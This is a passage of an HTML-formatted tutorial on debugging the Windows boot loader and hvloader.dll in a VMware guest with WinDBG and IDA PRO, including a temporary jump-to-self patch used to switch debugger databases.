vertical-align: baseline;">, and in the </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Process Options</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> specify the </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; 
font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Hostname</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> 127.0.0.1 and </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">port</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> 8864.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center; text-indent: 18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 168px; overflow: hidden; width: 349px;"><img height="168" src="https://lh5.googleusercontent.com/rfD1RhHz_K2F6NzMfdYDhGpL__VwgbSGdpqsrZ1s_q0mMcVF2vuaTXgoNaUHwjhu-Qrtc7nAnAxJCqdpWyHok0WqEGocuwTqD7LqoARaSiAWCYCABq6gKXTF6WTIHBuLJ3y7rly58qRKdk5rcg" style="margin-left: 0px; margin-top: 0px;" width="349" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Thanks to the 
previously set boot loader option </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">bootdebug on, </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">winload.efi breaks at an early boot stage in winload!DebugService2, and using WinDBG we can see the image base.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">6.</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Run WinDBG:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; 
font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WinDBG.exe -b -k net:port=50002,key=1.2.3.4</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">And find the address of </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">winload.efi</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: white; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">kd> lm</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: white; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">start end </span><span face="Calibri,sans-serif" style="-webkit-text-decoration-skip: none; background-color: white; color: blue; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; 
text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline;">module name</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: white; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00000000`008c4000 00000000`00aa5000 </span><span face="Calibri,sans-serif" style="-webkit-text-decoration-skip: none; background-color: white; color: blue; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline;">winload</span><span face="Calibri,sans-serif" style="background-color: white; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> (pdb symbols)</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">7.</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">We already loaded 
winload.efi in IDA PRO, now we can choose </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Debugger</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">-></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Attach to process</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> to attach to the VMware GDB stub, and after it stops, run </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; 
font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Edit->Segments->Rebase</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> program, specify the load address of </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">winload.efi</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> (0x008c4000) as the image base, and save it in IDA PRO. ASLR is not used in that case, so the load address does not change when you restart Windows. </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Winload.efi</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> can be debugged without the </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">rebase </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">operation.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 
35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;"><span face="'Noto Sans Symbols',sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">−</span><span face="'Noto Sans Symbols',sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">set a breakpoint in IDA PRO on winload!OslArchHypervisorSetup and continue debugging (F9); </span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;"><span face="'Noto Sans Symbols',sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">−</span><span face="'Noto Sans Symbols',sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">also continue debugging in WinDBG (F5).</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-left: 0.05pt; 
margin-top: 0pt; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">winload!OslGetHypervisorLaunchType checks whether the hypervisorlaunchtype BCD option (element 0x250000f0) is set.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 129px; overflow: hidden; width: 405px;"><img height="129" src="https://lh4.googleusercontent.com/zqAwWQZ9f9GsxFhg8u1S9HfrYoXQqLcjEh4sCCuKwidcDXVO6K_bxKEK6XUr3e5LFEbk0BlZWT9dzssNT3tWCywzAgxCPa0JcLT1JC6pijzny8mW8g4Qs6QJZGvBYfrjyy2ouH6pnXrhdGG3lA" style="margin-left: 0px; margin-top: 0px;" width="405" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 190px; overflow: hidden; width: 409px;"><img height="190" src="https://lh5.googleusercontent.com/YJHoEn4Bv1vFvShkbKsUBXZKFGNG-3rSK-EvPJWiCBJrQSaVwbfnKGilk1146X213Hwwzj7HpkBgdmXiR2iOjrZwA0vue6DOjhG2sW-9PLMCoNsaWDokTWt8KALNuuGCKyOKbrGlGJA3SOETLg" style="margin-left: 0px; margin-top: 0px;" width="409" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;"><span 
face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">If the option is present and its value is 1 (Auto), the function tries to load </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">hvloader.dll</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> and resolves the addresses of its exported functions:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HvlRescindVsm</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HvlLaunchHypervisor</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: 
baseline;">HvlLoadHypervisor</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HvlRegisterRuntimeRange</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HvlUpdateMcUpdateStatus</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HvlPreloadHypervisor</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 299px; overflow: hidden; width: 421px;"><img height="299" src="https://lh5.googleusercontent.com/98dRUyvFKaXyM3-vFVDocGHFkIfOZ4UXnG43juTMmuHlybRjtnwN1wspOZafV9d5LBmG5St4ljllhlGj5M7Xjf-CDOFcxpMpehdDVOr4zAqATDN-FL2RGfntzEBcaQzTruU4FCefw60ejh1d3Q" style="margin-left: 0px; margin-top: 0px;" width="421" 
/></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Next, go to </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">winload!HvlpLoadHypervisor</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">. After the call to </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">CmpFindSkuType</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> it calls </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">hvloader!HvlLoadHypervisor</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">.
</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The latest </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">hvloader.dll</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> ships without symbols, but we still want to save the results of our analysis to a database, and IDA PRO does not handle several binaries in one database well, so we have to switch between the winload.efi and hvloader.dll databases while the guest is stopped. The script </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">PatchHvLoader2019.py</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> prints hvloader_image_base (taken from the variable found earlier) and patches the start of HvlLoadHypervisor with an infinite loop (EB FE, a two-byte jump to itself), so the CPU spins at that address while we switch databases.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; 
text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 41px; overflow: hidden; width: 200px;"><img height="41" src="https://lh6.googleusercontent.com/SQntrhDdpsLAVkDaWCQYlB4C3bK1hoFsVhszHPnFI7ep_AtBGIHM99xh19-at4hm1oBvVozcoXP7hXm5I7QyxuDgtiJcgcouMYi9jRzhkLWLeEjQiQNI4hrWzLN-2T56gyqlWE3-kqlfG-3Dcg" style="margin-left: 0px; margin-top: 0px;" width="200" /></span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The script needs the </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">hvloader_image_base, p_HvlLoadHypervisor </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">and</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"> p_HvlLaunchHypervisor</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> variables to be filled in by hand. 
Their values are read inside the </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">winload!HvlpLoadHvLoader</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> function:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 129px; overflow: hidden; width: 264px;"><img height="129" src="https://lh5.googleusercontent.com/CIjf-VNMYM8nBUiOwpn1U-i6BHtnHaoJL1I4ym-8Kr_A_w1EinHkORGjL4yv5GyerqxsWCfFAVVYsEckCuBd_a_ec4LpwcyT8UqsgpFwVyYbPKaVPkhe1kUpHeHSxtygBujrv8ThAY0SUQnXcg" style="margin-left: 0px; margin-top: 0px;" width="264" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 264px; overflow: hidden; width: 360px;"><img height="264" src="https://lh4.googleusercontent.com/2Bi5MagB_HBd0QNDZsYsRX-NtXMaf_OWmdMr_Ftw43p27GGxmdsPn6MwNqyWk4VWXAvl5HU1rh6xwIRHVnGlWoPo4KqwxRCmYZgWSM_4FtHHWU7qPZ2n01K_T9EUS1o8EHZ4EjTWqra6EALCEg" style="margin-left: 0px; margin-top: 
0px;" width="360" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Note down the </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">hvloader_image_base</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> address. Close the current winload.efi GDB session (or simply detach from the process) and load hvloader.dll into IDA. Attach to the GDB stub again: the CPU is still spinning on the jump-to-self instruction, so nothing in the guest has moved. 
</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Run </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Edit</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">-></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Segments</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">-></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Rebase program</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> and enter the </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">hvloader_image_base</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> address. Then launch </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">RestoreHvLoader2019.py</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, which writes the original bytes back over the EB FE patch. Now you can debug hvloader.dll.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 100px; overflow: hidden; width: 378px;"><img height="100" src="https://lh3.googleusercontent.com/GFL-_9Xha2Ygmdqku1hcg48_R9qhIMWoAffA0aURsPGi16l4iEQRwvP_QW-tGlLPxNvTnjr-W-z9e8n2xhXateOKzodG2cLbyEx_HJkpJQHt8rZnIO8ztD93k_04HOEuDxDv60401LmZa-fqAg" style="margin-left: 0px; margin-top: 0px;" width="378" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Now we know fixed load addresses for both </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">winload.efi</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> and </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">hvloader.dll</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> (the hvloader load address was not randomized in my case). </span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">We can now power off the VM, enable Secure Boot in the VM settings (</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Options</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">-></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Advanced</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">-></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">UEFI</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; 